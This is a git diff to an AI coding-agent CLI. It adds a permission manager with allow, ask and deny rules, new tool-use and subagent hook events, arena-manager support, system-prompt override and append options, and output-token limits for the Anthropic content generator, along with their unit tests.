+ */ + onPersistPermissionRule?: ( + scope: 'project' | 'user', + ruleType: 'allow' | 'ask' | 'deny', + rule: string, + ) => Promise; } function normalizeConfigOutputFormat( @@ -435,6 +481,7 @@ export class Config { private subagentManager!: SubagentManager; private extensionManager!: ExtensionManager; private skillManager: SkillManager | null = null; + private permissionManager: PermissionManager | null = null; private fileSystemService: FileSystemService; private contentGeneratorConfig!: ContentGeneratorConfig; private contentGeneratorConfigSources: ContentGeneratorConfigSources = {}; @@ -451,9 +498,14 @@ export class Config { private readonly outputFormat: OutputFormat; private readonly includePartialMessages: boolean; private readonly question: string | undefined; + private readonly systemPrompt: string | undefined; + private readonly appendSystemPrompt: string | undefined; private readonly coreTools: string[] | undefined; private readonly allowedTools: string[] | undefined; private readonly excludeTools: string[] | undefined; + private readonly permissionsAllow: string[]; + private readonly permissionsAsk: string[]; + private readonly permissionsDeny: string[]; private readonly toolDiscoveryCommand: string | undefined; private readonly toolCallCommand: string | undefined; private readonly mcpServerCommand: string | undefined; @@ -498,9 +550,6 @@ export class Config { private readonly listExtensions: boolean; private readonly overrideExtensions?: string[]; - private readonly summarizeToolOutput: - | Record - | undefined; private readonly cliVersion?: string; private readonly experimentalZedIntegration: boolean = false; private readonly chatRecordingEnabled: boolean; @@ -522,18 +571,28 @@ export class Config { private readonly shouldUseNodePtyShell: boolean; private readonly skipNextSpeakerCheck: boolean; private shellExecutionConfig: ShellExecutionConfig; + private arenaManager: ArenaManager | null = null; + private arenaManagerChangeCallback: + | ((manager: 
ArenaManager | null) => void) + | null = null; + private readonly arenaAgentClient: ArenaAgentClient | null; + private readonly agentsSettings: AgentsCollabSettings; private readonly skipLoopDetection: boolean; private readonly skipStartupContext: boolean; private readonly warnings: string[]; + private readonly onPersistPermissionRuleCallback?: ( + scope: 'project' | 'user', + ruleType: 'allow' | 'ask' | 'deny', + rule: string, + ) => Promise; private initialized: boolean = false; readonly storage: Storage; private readonly fileExclusions: FileExclusions; private readonly truncateToolOutputThreshold: number; private readonly truncateToolOutputLines: number; - private readonly enableToolOutputTruncation: boolean; private readonly eventEmitter?: EventEmitter; private readonly channel: string | undefined; - private readonly defaultFileEncoding: FileEncodingType; + private readonly defaultFileEncoding: FileEncodingType | undefined; private readonly enableHooks: boolean; private readonly hooks?: Record; private readonly hooksConfig?: Record; @@ -561,9 +620,14 @@ export class Config { this.outputFormat = normalizedOutputFormat ?? OutputFormat.TEXT; this.includePartialMessages = params.includePartialMessages ?? false; this.question = params.question; + this.systemPrompt = params.systemPrompt; + this.appendSystemPrompt = params.appendSystemPrompt; this.coreTools = params.coreTools; this.allowedTools = params.allowedTools; this.excludeTools = params.excludeTools; + this.permissionsAllow = params.permissions?.allow || []; + this.permissionsAsk = params.permissions?.ask || []; + this.permissionsDeny = params.permissions?.deny || []; this.toolDiscoveryCommand = params.toolDiscoveryCommand; this.toolCallCommand = params.toolCallCommand; this.mcpServerCommand = params.mcpServerCommand; @@ -614,7 +678,6 @@ export class Config { this.listExtensions = params.listExtensions ?? false; this.overrideExtensions = params.overrideExtensions; this.noBrowser = params.noBrowser ?? 
false; - this.summarizeToolOutput = params.summarizeToolOutput; this.folderTrustFeature = params.folderTrustFeature ?? false; this.folderTrust = params.folderTrust ?? false; this.ideMode = params.ideMode ?? false; @@ -632,6 +695,7 @@ export class Config { this.skipLoopDetection = params.skipLoopDetection ?? false; this.skipStartupContext = params.skipStartupContext ?? false; this.warnings = params.warnings ?? []; + this.onPersistPermissionRuleCallback = params.onPersistPermissionRule; // Web search this.webSearch = params.webSearch; @@ -651,13 +715,14 @@ export class Config { DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD; this.truncateToolOutputLines = params.truncateToolOutputLines ?? DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES; - this.enableToolOutputTruncation = params.enableToolOutputTruncation ?? true; this.channel = params.channel; - this.defaultFileEncoding = params.defaultFileEncoding ?? FileEncoding.UTF8; + this.defaultFileEncoding = params.defaultFileEncoding; this.storage = new Storage(this.targetDir); this.inputFormat = params.inputFormat ?? InputFormat.TEXT; this.fileExclusions = new FileExclusions(this); this.eventEmitter = params.eventEmitter; + this.arenaAgentClient = ArenaAgentClient.create(); + this.agentsSettings = params.agents ?? {}; if (params.contextFileName) { setGeminiMdFilename(params.contextFileName); } @@ -760,6 +825,73 @@ export class Config { (input['last_assistant_message'] as string) || '', ); break; + case 'PreToolUse': { + result = await hookSystem.firePreToolUseEvent( + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['tool_use_id'] as string) || '', + (input['permission_mode'] as PermissionMode | undefined) ?? 
+ PermissionMode.Default, + ); + break; + } + case 'PostToolUse': + result = await hookSystem.firePostToolUseEvent( + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['tool_response'] as Record) || {}, + (input['tool_use_id'] as string) || '', + (input['permission_mode'] as PermissionMode) || 'default', + ); + break; + case 'PostToolUseFailure': + result = await hookSystem.firePostToolUseFailureEvent( + (input['tool_use_id'] as string) || '', + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['error'] as string) || '', + input['is_interrupt'] as boolean | undefined, + (input['permission_mode'] as PermissionMode) || 'default', + ); + break; + case 'Notification': + result = await hookSystem.fireNotificationEvent( + (input['message'] as string) || '', + (input['notification_type'] as NotificationType) || + 'permission_prompt', + (input['title'] as string) || undefined, + ); + break; + case 'PermissionRequest': + result = await hookSystem.firePermissionRequestEvent( + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['permission_mode'] as PermissionMode) || + PermissionMode.Default, + (input['permission_suggestions'] as + | PermissionSuggestion[] + | undefined) || undefined, + ); + break; + case 'SubagentStart': + result = await hookSystem.fireSubagentStartEvent( + (input['agent_id'] as string) || '', + (input['agent_type'] as string) || '', + (input['permission_mode'] as PermissionMode) || + PermissionMode.Default, + ); + break; + case 'SubagentStop': + result = await hookSystem.fireSubagentStopEvent( + (input['agent_id'] as string) || '', + (input['agent_type'] as string) || '', + (input['agent_transcript_path'] as string) || '', + (input['last_assistant_message'] as string) || '', + (input['stop_hook_active'] as boolean) || false, + (input['permission_mode'] as PermissionMode) || + PermissionMode.Default, + ); + break; default: this.debugLogger.warn( 
`Unknown hook event: ${request.eventName}`, @@ -787,6 +919,8 @@ export class Config { ); this.debugLogger.debug('MessageBus initialized with hook subscription'); + } else { + this.debugLogger.debug('Hook system disabled, skipping initialization'); } this.subagentManager = new SubagentManager(this); @@ -794,6 +928,10 @@ export class Config { await this.skillManager.startWatching(); this.debugLogger.debug('Skill manager initialized'); + this.permissionManager = new PermissionManager(this); + this.permissionManager.initialize(); + this.debugLogger.debug('Permission manager initialized'); + // Load session subagents if they were provided before initialization if (this.sessionSubagents.length > 0) { this.subagentManager.loadSessionSubagents(this.sessionSubagents); @@ -910,6 +1048,21 @@ export class Config { // Initialize BaseLlmClient now that the ContentGenerator is available this.baseLlmClient = new BaseLlmClient(this.contentGenerator, this); + + // Fire auth_success notification hook (supports both interactive & non-interactive) + const messageBus = this.getMessageBus(); + const hooksEnabled = this.getEnableHooks(); + if (hooksEnabled && messageBus) { + fireNotificationHook( + messageBus, + `Successfully authenticated with ${authMethod}`, + NotificationType.AuthSuccess, + 'Authentication successful', + ).catch(() => { + // Silently ignore errors - fireNotificationHook has internal error handling + // and notification hooks should not block the auth flow + }); + } } /** @@ -1166,6 +1319,10 @@ export class Config { return this.targetDir; } + getCwd(): string { + return this.targetDir; + } + getWorkspaceContext(): WorkspaceContext { return this.workspaceContext; } @@ -1190,6 +1347,8 @@ export class Config { if (this.toolRegistry) { await this.toolRegistry.stop(); } + + await this.cleanupArenaRuntime(); } catch (error) { // Log but don't throw - cleanup should be best-effort this.debugLogger.error('Error during Config shutdown:', error); @@ -1208,16 +1367,68 @@ export 
class Config { return this.question; } + getSystemPrompt(): string | undefined { + return this.systemPrompt; + } + + getAppendSystemPrompt(): string | undefined { + return this.appendSystemPrompt; + } + + /** @deprecated Use getPermissionsAllow() instead. */ getCoreTools(): string[] | undefined { return this.coreTools; } - getAllowedTools(): string[] | undefined { - return this.allowedTools; + /** + * Returns the merged allow-rules for PermissionManager. + * + * This merges all sources so that PermissionManager receives a single, + * authoritative list: + * - settings.permissions.allow (persistent rules from all scopes) + * - allowedTools param (SDK / argv auto-approve list) + * + * Note: coreTools is intentionally excluded here — it has whitelist semantics + * (only listed tools are registered), not auto-approve semantics. It is + * handled separately via PermissionManager.coreToolsAllowList. + * + * CLI callers (loadCliConfig) already pre-merge argv into permissionsAllow + * before constructing Config, so those fields will be empty for CLI usage. + * SDK callers construct Config directly and rely on allowedTools. + */ + getPermissionsAllow(): string[] { + const base = this.permissionsAllow ?? []; + const sdkAllow = [...(this.allowedTools ?? [])]; + if (sdkAllow.length === 0) return base.length > 0 ? base : []; + const merged = [...base]; + for (const t of sdkAllow) { + if (t && !merged.includes(t)) merged.push(t); + } + return merged; } - getExcludeTools(): string[] | undefined { - return this.excludeTools; + getPermissionsAsk(): string[] { + return this.permissionsAsk; + } + + /** + * Returns the merged deny-rules for PermissionManager. + * + * Merges: + * - settings.permissions.deny (persistent rules from all scopes) + * - excludeTools param (SDK / argv blocklist) + * + * CLI callers pre-merge argv.excludeTools into permissionsDeny. + */ + getPermissionsDeny(): string[] { + const base = this.permissionsDeny ?? []; + const sdkDeny = this.excludeTools ?? 
[]; + if (sdkDeny.length === 0) return base.length > 0 ? base : []; + const merged = [...base]; + for (const t of sdkDeny) { + if (t && !merged.includes(t)) merged.push(t); + } + return merged; } getToolDiscoveryCommand(): string | undefined { @@ -1334,6 +1545,50 @@ export class Config { this.geminiMdFileCount = count; } + getArenaManager(): ArenaManager | null { + return this.arenaManager; + } + + setArenaManager(manager: ArenaManager | null): void { + this.arenaManager = manager; + this.arenaManagerChangeCallback?.(manager); + } + + /** + * Register a callback invoked whenever the arena manager changes. + * Pass `null` to unsubscribe. Only one subscriber is supported. + */ + onArenaManagerChange( + cb: ((manager: ArenaManager | null) => void) | null, + ): void { + this.arenaManagerChangeCallback = cb; + } + + getArenaAgentClient(): ArenaAgentClient | null { + return this.arenaAgentClient; + } + + getAgentsSettings(): AgentsCollabSettings { + return this.agentsSettings; + } + + /** + * Clean up Arena runtime. When `force` is true (e.g., /arena select --discard), + * always removes worktrees regardless of preserveArtifacts. + */ + async cleanupArenaRuntime(force?: boolean): Promise { + const manager = this.arenaManager; + if (!manager) { + return; + } + if (!force && this.agentsSettings.arena?.preserveArtifacts) { + await manager.cleanupRuntime(); + } else { + await manager.cleanup(); + } + this.setArenaManager(null); + } + getApprovalMode(): ApprovalMode { return this.approvalMode; } @@ -1599,12 +1854,6 @@ export class Config { return this.getNoBrowser() || !shouldAttemptBrowserLaunch(); } - getSummarizeToolOutputConfig(): - | Record - | undefined { - return this.summarizeToolOutput; - } - // Web search provider configuration getWebSearchConfig() { return this.webSearch; @@ -1665,7 +1914,7 @@ export class Config { * Get the default file encoding for new files. 
* @returns FileEncodingType */ - getDefaultFileEncoding(): FileEncodingType { + getDefaultFileEncoding(): FileEncodingType | undefined { return this.defaultFileEncoding; } @@ -1733,15 +1982,8 @@ export class Config { return this.skipStartupContext; } - getEnableToolOutputTruncation(): boolean { - return this.enableToolOutputTruncation; - } - getTruncateToolOutputThreshold(): number { - if ( - !this.enableToolOutputTruncation || - this.truncateToolOutputThreshold <= 0 - ) { + if (this.truncateToolOutputThreshold <= 0) { return Number.POSITIVE_INFINITY; } @@ -1749,7 +1991,7 @@ export class Config { } getTruncateToolOutputLines(): number { - if (!this.enableToolOutputTruncation || this.truncateToolOutputLines <= 0) { + if (this.truncateToolOutputLines <= 0) { return Number.POSITIVE_INFINITY; } @@ -1818,8 +2060,27 @@ export class Config { return this.skillManager; } + getPermissionManager(): PermissionManager | null { + return this.permissionManager; + } + + /** + * Returns the callback for persisting permission rules to settings files. + * Returns undefined if no callback was provided (e.g. SDK mode). 
+ */ + getOnPersistPermissionRule(): + | (( + scope: 'project' | 'user', + ruleType: 'allow' | 'ask' | 'deny', + rule: string, + ) => Promise) + | undefined { + return this.onPersistPermissionRuleCallback; + } + async createToolRegistry( sendSdkMcpMessage?: SendSdkMcpMessage, + options?: { skipDiscovery?: boolean }, ): Promise { const registry = new ToolRegistry( this, @@ -1827,9 +2088,6 @@ export class Config { sendSdkMcpMessage, ); - const coreToolsConfig = this.getCoreTools(); - const excludeToolsConfig = this.getExcludeTools(); - // Helper to create & register core tools that are enabled // eslint-disable-next-line @typescript-eslint/no-explicit-any const registerCoreTool = (ToolClass: any, ...args: unknown[]) => { @@ -1845,7 +2103,13 @@ export class Config { return; } - if (isToolEnabled(toolName, coreToolsConfig, excludeToolsConfig)) { + // PermissionManager handles both the coreTools allowlist (registry-level) + // and deny rules (runtime-level) in a single check. + const pmEnabled = this.permissionManager + ? this.permissionManager.isToolEnabled(toolName) + : true; // Should never reach here after initialize(), but safe default. 
+ + if (pmEnabled) { try { registry.registerTool(new ToolClass(...args)); } catch (error) { @@ -1909,7 +2173,9 @@ export class Config { registerCoreTool(LspTool, this); } - await registry.discoverAllTools(); + if (!options?.skipDiscovery) { + await registry.discoverAllTools(); + } this.debugLogger.debug( `ToolRegistry created: ${JSON.stringify(registry.getAllToolNames())} (${registry.getAllToolNames().length} tools)`, ); diff --git a/packages/core/src/config/storage.ts b/packages/core/src/config/storage.ts index 3293280a8..2697054a4 100644 --- a/packages/core/src/config/storage.ts +++ b/packages/core/src/config/storage.ts @@ -12,11 +12,13 @@ import { getProjectHash, sanitizeCwd } from '../utils/paths.js'; export const QWEN_DIR = '.qwen'; export const GOOGLE_ACCOUNTS_FILENAME = 'google_accounts.json'; export const OAUTH_FILE = 'oauth_creds.json'; +export const SKILL_PROVIDER_CONFIG_DIRS = ['.qwen', '.agent']; const TMP_DIR_NAME = 'tmp'; const BIN_DIR_NAME = 'bin'; const PROJECT_DIR_NAME = 'projects'; const IDE_DIR_NAME = 'ide'; const DEBUG_DIR_NAME = 'debug'; +const ARENA_DIR_NAME = 'arena'; export class Storage { private readonly targetDir: string; @@ -77,6 +79,10 @@ export class Storage { return path.join(Storage.getGlobalQwenDir(), BIN_DIR_NAME); } + static getGlobalArenaDir(): string { + return path.join(Storage.getGlobalQwenDir(), ARENA_DIR_NAME); + } + getQwenDir(): string { return path.join(this.targetDir, QWEN_DIR); } @@ -133,8 +139,20 @@ export class Storage { return path.join(this.getExtensionsDir(), 'qwen-extension.json'); } - getUserSkillsDir(): string { - return path.join(Storage.getGlobalQwenDir(), 'skills'); + getUserSkillsDirs(): string[] { + const homeDir = os.homedir() || os.tmpdir(); + return SKILL_PROVIDER_CONFIG_DIRS.map((dir) => + path.join(homeDir, dir, 'skills'), + ); + } + + /** + * Returns the user-level extensions directory (~/.qwen/extensions/). 
+ * Extensions installed at user scope are stored here, as opposed to + * project-level extensions which live in /.qwen/extensions/. + */ + static getUserExtensionsDir(): string { + return path.join(Storage.getGlobalQwenDir(), 'extensions'); } getHistoryFilePath(): string { diff --git a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts index 3f0e17197..16cf3622f 100644 --- a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts +++ b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.test.ts @@ -328,6 +328,170 @@ describe('AnthropicContentGenerator', () => { expect.not.objectContaining({ thinking: expect.anything() }), ); }); + + describe('output token limits', () => { + it('caps configured samplingParams.max_tokens to model output limit', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: { max_tokens: 200_000 }, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 65536 }), + ); + }); + + it('caps request.config.maxOutputTokens to model output limit when config max_tokens is missing', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 
'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: {}, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + config: { maxOutputTokens: 100_000 }, + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 65536 }), + ); + }); + + it('uses conservative default when max_tokens is not explicitly configured', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: {}, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 32000 }), + ); + }); + + it('respects configured max_tokens for unknown models', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'unknown-model', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'unknown-model', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: { max_tokens: 100_000 }, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + 
model: 'models/ignored', + contents: 'Hello', + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 100_000 }), + ); + }); + + it('treats null maxOutputTokens as not configured', async () => { + const { AnthropicContentGenerator } = await importGenerator(); + anthropicState.createImpl.mockResolvedValue({ + id: 'anthropic-1', + model: 'claude-sonnet-4', + content: [{ type: 'text', text: 'hi' }], + }); + + const generator = new AnthropicContentGenerator( + { + model: 'claude-sonnet-4', + apiKey: 'test-key', + timeout: 10_000, + maxRetries: 2, + samplingParams: {}, + schemaCompliance: 'auto', + }, + mockConfig, + ); + + await generator.generateContent({ + model: 'models/ignored', + contents: 'Hello', + config: { maxOutputTokens: null as unknown as undefined }, + } as unknown as GenerateContentParameters); + + const [anthropicRequest] = + anthropicState.lastCreateArgs as AnthropicCreateArgs; + expect(anthropicRequest).toEqual( + expect.objectContaining({ max_tokens: 32000 }), + ); + }); + }); }); describe('countTokens', () => { diff --git a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts index 3fcd4b96d..e3c61893e 100644 --- a/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts +++ b/packages/core/src/core/anthropicContentGenerator/anthropicContentGenerator.ts @@ -31,6 +31,11 @@ import { AnthropicContentConverter } from './converter.js'; import { buildRuntimeFetchOptions } from '../../utils/runtimeFetchOptions.js'; import { DEFAULT_TIMEOUT } from '../openaiContentGenerator/constants.js'; import { createDebugLogger } from '../../utils/debugLogger.js'; +import { + tokenLimit, + DEFAULT_OUTPUT_TOKEN_LIMIT, + hasExplicitOutputLimit, +} from '../tokenLimits.js'; const debugLogger = 
createDebugLogger('ANTHROPIC'); @@ -223,8 +228,18 @@ export class AnthropicContentGenerator implements ContentGenerator { return configValue !== undefined ? configValue : requestValue; }; + // Apply output token limit logic consistent with OpenAI providers + const userMaxTokens = getParam('max_tokens', 'maxOutputTokens'); + const modelId = this.contentGeneratorConfig.model; + const modelLimit = tokenLimit(modelId, 'output'); + const isKnownModel = hasExplicitOutputLimit(modelId); + const maxTokens = - getParam('max_tokens', 'maxOutputTokens') ?? 10_000; + userMaxTokens !== undefined && userMaxTokens !== null + ? isKnownModel + ? Math.min(userMaxTokens, modelLimit) + : userMaxTokens + : Math.min(modelLimit, DEFAULT_OUTPUT_TOKEN_LIMIT); return { max_tokens: maxTokens, diff --git a/packages/core/src/core/client.test.ts b/packages/core/src/core/client.test.ts index f374a1d44..d9bdfe7a7 100644 --- a/packages/core/src/core/client.test.ts +++ b/packages/core/src/core/client.test.ts @@ -15,7 +15,7 @@ import { } from 'vitest'; import type { Content, GenerateContentResponse, Part } from '@google/genai'; -import { GeminiClient } from './client.js'; +import { GeminiClient, SendMessageType } from './client.js'; import { findCompressSplitPoint } from '../services/chatCompressionService.js'; import { AuthType, @@ -31,7 +31,7 @@ import { Turn, type ChatCompressionInfo, } from './turn.js'; -import { getCoreSystemPrompt } from './prompts.js'; +import { getCoreSystemPrompt, getCustomSystemPrompt } from './prompts.js'; import { DEFAULT_QWEN_FLASH_MODEL } from '../config/models.js'; import { FileDiscoveryService } from '../services/fileDiscoveryService.js'; import { promptIdContext } from '../utils/promptIdContext.js'; @@ -315,6 +315,8 @@ describe('Gemini Client (client.ts)', () => { getVertexAI: vi.fn().mockReturnValue(false), getUserAgent: vi.fn().mockReturnValue('test-agent'), getUserMemory: vi.fn().mockReturnValue(''), + getSystemPrompt: vi.fn().mockReturnValue(undefined), + 
getAppendSystemPrompt: vi.fn().mockReturnValue(undefined), getFullContext: vi.fn().mockReturnValue(false), getSessionId: vi.fn().mockReturnValue('test-session-id'), getProxy: vi.fn().mockReturnValue(undefined), @@ -357,8 +359,17 @@ describe('Gemini Client (client.ts)', () => { getSkipLoopDetection: vi.fn().mockReturnValue(false), getChatRecordingService: vi.fn().mockReturnValue(undefined), getResumedSessionData: vi.fn().mockReturnValue(undefined), + getArenaAgentClient: vi.fn().mockReturnValue(null), getEnableHooks: vi.fn().mockReturnValue(false), + getArenaManager: vi.fn().mockReturnValue(null), getMessageBus: vi.fn().mockReturnValue(undefined), + getHookSystem: vi.fn().mockReturnValue(undefined), + getDebugLogger: vi.fn().mockReturnValue({ + debug: vi.fn(), + info: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + }), } as unknown as Config; client = new GeminiClient(mockConfig); @@ -1552,7 +1563,7 @@ Other open files: [{ text: 'Start conversation' }], signal, 'prompt-id-3', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, Number.MAX_SAFE_INTEGER, // Bypass the MAX_TURNS protection ); @@ -2305,6 +2316,70 @@ Other open files: // Assert - loop detection methods should not be called when skipLoopDetection is true expect(ldMock.addAndCheck).not.toHaveBeenCalled(); }); + + describe('retry sendMessageType', () => { + it('should call stripOrphanedUserEntriesFromHistory before executing', async () => { + const mockChat: Partial = { + addHistory: vi.fn(), + getHistory: vi.fn().mockReturnValue([]), + setHistory: vi.fn(), + stripThoughtsFromHistory: vi.fn(), + stripOrphanedUserEntriesFromHistory: vi.fn(), + }; + client['chat'] = mockChat as GeminiChat; + + const mockStream = (async function* () { + yield { type: 'content', value: 'retry response' }; + })(); + mockTurnRunFn.mockReturnValue(mockStream); + + // Act: send with retry type + const stream = client.sendMessageStream( + [{ text: 'second message' }], + new AbortController().signal, + 'prompt-retry', + 
{ type: SendMessageType.Retry }, + ); + for await (const _ of stream) { + /* consume */ + } + + // Assert: the cleanup method was called + expect( + mockChat.stripOrphanedUserEntriesFromHistory, + ).toHaveBeenCalledOnce(); + }); + + it('should not increment sessionTurnCount for retry', async () => { + const mockChat: Partial = { + addHistory: vi.fn(), + getHistory: vi.fn().mockReturnValue([]), + setHistory: vi.fn(), + stripThoughtsFromHistory: vi.fn(), + stripOrphanedUserEntriesFromHistory: vi.fn(), + }; + client['chat'] = mockChat as GeminiChat; + + const mockStream = (async function* () { + yield { type: 'content', value: 'ok' }; + })(); + mockTurnRunFn.mockReturnValue(mockStream); + + const turnCountBefore = client['sessionTurnCount']; + + const stream = client.sendMessageStream( + [{ text: 'retry' }], + new AbortController().signal, + 'prompt-retry-3', + { type: SendMessageType.Retry }, + ); + for await (const _ of stream) { + /* consume */ + } + + expect(client['sessionTurnCount']).toBe(turnCountBefore); + }); + }); }); describe('generateContent', () => { @@ -2412,6 +2487,104 @@ Other open files: ); }); + it('should use config system prompt override when provided', async () => { + const contents = [{ role: 'user', parts: [{ text: 'hello' }] }]; + const abortSignal = new AbortController().signal; + + vi.spyOn(client['config'], 'getSystemPrompt').mockReturnValue( + 'Override prompt', + ); + vi.spyOn(client['config'], 'getUserMemory').mockReturnValue( + 'Saved memory', + ); + vi.mocked(getCustomSystemPrompt).mockReturnValueOnce( + 'Override prompt with memory', + ); + + await client.generateContent( + contents, + {}, + abortSignal, + DEFAULT_QWEN_FLASH_MODEL, + ); + + expect(getCustomSystemPrompt).toHaveBeenCalledWith( + 'Override prompt', + 'Saved memory', + undefined, + ); + expect(mockContentGenerator.generateContent).toHaveBeenCalledWith( + expect.objectContaining({ + config: expect.objectContaining({ + systemInstruction: 'Override prompt with memory', + }), 
+ }), + 'test-session-id', + ); + }); + + it('should append config appendSystemPrompt to the core system prompt', async () => { + const contents = [{ role: 'user', parts: [{ text: 'hello' }] }]; + const abortSignal = new AbortController().signal; + + vi.mocked(getCoreSystemPrompt).mockClear(); + vi.spyOn(client['config'], 'getAppendSystemPrompt').mockReturnValue( + 'Be extra concise.', + ); + + await client.generateContent( + contents, + {}, + abortSignal, + DEFAULT_QWEN_FLASH_MODEL, + ); + + expect(getCoreSystemPrompt).toHaveBeenCalledWith( + '', + 'test-model', + 'Be extra concise.', + ); + }); + + it('should append config appendSystemPrompt after a config system prompt override', async () => { + const contents = [{ role: 'user', parts: [{ text: 'hello' }] }]; + const abortSignal = new AbortController().signal; + + vi.spyOn(client['config'], 'getSystemPrompt').mockReturnValue( + 'Override prompt', + ); + vi.spyOn(client['config'], 'getAppendSystemPrompt').mockReturnValue( + 'Focus on findings only.', + ); + vi.spyOn(client['config'], 'getUserMemory').mockReturnValue( + 'Saved memory', + ); + vi.mocked(getCustomSystemPrompt).mockReturnValueOnce( + 'Override prompt with memory and append', + ); + + await client.generateContent( + contents, + {}, + abortSignal, + DEFAULT_QWEN_FLASH_MODEL, + ); + + expect(getCustomSystemPrompt).toHaveBeenCalledWith( + 'Override prompt', + 'Saved memory', + 'Focus on findings only.', + ); + expect(mockContentGenerator.generateContent).toHaveBeenCalledWith( + expect.objectContaining({ + config: expect.objectContaining({ + systemInstruction: 'Override prompt with memory and append', + }), + }), + 'test-session-id', + ); + }); + // Note: there is currently no "fallback mode" model routing; the model used // is always the one explicitly requested by the caller. 
}); diff --git a/packages/core/src/core/client.ts b/packages/core/src/core/client.ts index 64822453a..4550b43ac 100644 --- a/packages/core/src/core/client.ts +++ b/packages/core/src/core/client.ts @@ -23,6 +23,7 @@ const debugLogger = createDebugLogger('CLIENT'); import type { ContentGenerator } from './contentGenerator.js'; import { GeminiChat } from './geminiChat.js'; import { + getArenaSystemReminder, getCoreSystemPrompt, getCustomSystemPrompt, getPlanModeSystemReminder, @@ -86,6 +87,17 @@ import type { StopHookOutput } from '../hooks/types.js'; const MAX_TURNS = 100; +export enum SendMessageType { + UserQuery = 'userQuery', + ToolResult = 'toolResult', + Retry = 'retry', + Hook = 'hook', +} + +export interface SendMessageOptions { + type: SendMessageType; +} + export class GeminiClient { private chat?: GeminiChat; private sessionTurnCount = 0; @@ -153,6 +165,10 @@ export class GeminiClient { this.getChat().stripThoughtsFromHistory(); } + private stripOrphanedUserEntriesFromHistory() { + this.getChat().stripOrphanedUserEntriesFromHistory(); + } + setHistory(history: Content[]) { this.getChat().setHistory(history); this.forceFullIdeContext = true; @@ -184,6 +200,26 @@ export class GeminiClient { }); } + private getMainSessionSystemInstruction(): string { + const userMemory = this.config.getUserMemory(); + const overrideSystemPrompt = this.config.getSystemPrompt(); + const appendSystemPrompt = this.config.getAppendSystemPrompt(); + + if (overrideSystemPrompt) { + return getCustomSystemPrompt( + overrideSystemPrompt, + userMemory, + appendSystemPrompt, + ); + } + + return getCoreSystemPrompt( + userMemory, + this.config.getModel(), + appendSystemPrompt, + ); + } + async startChat(extraHistory?: Content[]): Promise { this.forceFullIdeContext = true; this.hasFailedCompressionAttempt = false; @@ -195,9 +231,7 @@ export class GeminiClient { const history = await getInitialChatHistory(this.config, extraHistory); try { - const userMemory = this.config.getUserMemory(); - 
